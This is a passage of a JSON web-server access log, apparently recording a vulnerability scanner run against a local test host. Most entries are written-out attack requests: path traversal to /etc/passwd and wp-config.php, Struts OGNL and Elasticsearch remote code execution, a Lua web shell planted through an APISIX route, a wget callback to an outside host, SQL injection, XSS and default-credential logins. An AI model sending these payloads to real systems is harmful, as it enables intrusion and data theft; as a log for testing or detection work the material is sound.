(KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"\x0D\x0A ]>\x0D\x0A\x0D\x0AJohn\x0D\x0A&ent;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/api/product/manger/getInfo HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"key=';`wget http://c9v8h8gsmpv8c1qg07h01rj5z8ff7yrsj.oast.fun`;#","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.185","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.188","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/canal/config/1/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /EemAdminService/EemAdmin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/privatekey.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/wdisp/admin/public/default.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pma/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.dockerfile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/awstats.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.190","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /threaddump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /template/custom/content-editor HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"{\x0D\x0A \x22size\x22: 1,\x0D\x0A \x22query\x22: {\x0D\x0A \x22filtered\x22: {\x0D\x0A \x22query\x22: {\x0D\x0A \x22match_all\x22: {\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A },\x0D\x0A \x22script_fields\x22: {\x0D\x0A \x22command\x22: {\x0D\x0A \x22script\x22: \x22import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\x5C\x22cat /etc/passwd\x5C\x22).getInputStream()).useDelimiter(\x5C\x22\x5C\x5C\x5C\x5CA\x5C\x22).next();\x22\x0D\x0A }\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_search?pretty HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin-ng/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.195","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webstats/awstats.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /templates/editor-preload-container HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"{\x0D\x0A \x22uri\x22:\x22/297MTv2O8BCBHAqG8ARRp6tGERi\x22,\x0D\x0A \x22script\x22:\x22local _M = {} \x5Cn function _M.access(conf, ctx) \x5Cn local os = require('os')\x5Cn local args = assert(ngx.req.get_uri_args()) \x5Cn local f = assert(io.popen(args.cmd, 'r'))\x5Cn local s = assert(f:read('*a'))\x5Cn ngx.say(s)\x5Cn f:close() \x5Cn end \x5Cnreturn _M\x22,\x0D\x0A \x22upstream\x22:{\x0D\x0A \x22type\x22:\x22roundrobin\x22,\x0D\x0A \x22nodes\x22:{\x0D\x0A \x22example.com:80\x22:1\x0D\x0A }\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apisix/admin/routes HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"loginUsername=admin&loginPassword=axis2","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /axis2-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.069","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/threaddump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.Dockerfile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.072","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /explore/snippets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-browser/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup/index.php?page=servers&mode=test&id=\x22>'> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.211","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\x5C0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"userName=admin&password=axis2&submit=+Login+","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /axis2/axis2-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configprops HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MTv2O8BCBHAqG8ARRp6tGERi?cmd=id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dfsms/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/files/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.240","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /-/snippets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/mainfunction.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/bbpress/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccm-web/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.186","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lab.html?vpath=//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/configprops HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sslvpn/Login/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 